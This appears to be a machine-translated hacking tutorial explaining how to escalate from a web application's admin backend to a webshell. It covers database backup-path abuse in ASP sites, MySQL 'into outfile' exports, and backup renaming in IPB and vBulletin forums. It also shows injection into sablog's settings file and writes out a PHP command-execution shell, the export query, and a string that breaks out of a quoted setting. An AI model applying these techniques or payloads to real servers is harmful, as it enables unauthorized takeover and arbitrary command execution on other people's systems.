Some ideas from the background to webshell

1. asp + acc/mssql Program

It mainly uses the "backup database" or "Restore database" function of the access database in the background, and does not filter variables such as "backup database path". As a result, any file suffix can be changed to asp, to obtain the webshell, The msssql program directly applies the access code, so that the SQL version can still be used. For detailed methods and analysis, refer to angel's article "Analysis of webshell obtained by Forum 7.0". As far as I know, there are still many vulnerabilities in the asp program background, which are similar in usage methods.
2. php + mysql Program
①. Use the data query function in the background
Some programs provide the mysql data query function in the background, and we can use it to execute select... into outfile: Query and output the PHP file. Because all the data is stored in mysql, We can insert our webshell code into mysql by using normal means... the into outfile statement exports the shell. Here we will use the ipb forum for a demonstration:
Step 1: write our webshell code to the database
Find a place that can be written and note that you do not need to filter your input. Here we will use the background to create a forum and write our shell code in the Forum description. <? System ($ c);?> Submit OK to write our shell to the database.
Step 2: Export webshell
In "SQL management", "mysql toolbox" writes statements in "run query:
Select * from 123 forums into outfile 'd: \ shell. php'
^
Absolute path to the web directory of the table where shell code is located
If the mysql query on the host is successful, we will get our webshell:
Http: // 127.0.0.1/test/shell. php? C = dir
②. Use mysql Data Backup
In combination with the above two cases, some programs have no restrictions on the types of backup files in the standby database, so as to export the PHP file, we write the webshell code into the database as in section 1, we can use this method to obtain webshell through vbb forum, which we are familiar with when exporting webshells using data backup:
We set the user signature to <? System ($ c);?> Back up the database in the background, change "back up the database to file on the server" to shell. php, and submit and save the backup. We can access our shell in the root directory of the Forum. Because the files may be large everywhere, we can change the webshell code that can generate files.
Some ideas from the backend to webshell-Supplement
Text/superhei
Ideas:
Using the web Background system settings, if the system settings are saved in the php/asp file, we can write webshell code in the settings to the php/asp file that saves the settings.
Demo:
The basic settings of the program sablog and sablog are saved in admin \ settings. php. Because the 10 variables submitted in the background are not filtered, we can write arbitrary code to admin \ settings. php.
Go to the backend -- "Basic settings" -- "blog name" and other items.) -- enter the code: sss "; phpinfo ();" ss -- submit.
In this way, we write phpinfo () to admin \ settings. php. We can see that admin \ settings. php normally displays php information.
Summary:
The above is a demonstration of php and other systems. It is also suitable for other systems such as asp, such as power, and cloud download ). Be careful when writing code. If the code is incorrect, the entire web system may be paralyzed.
Another one is to use the Upload Vulnerability :).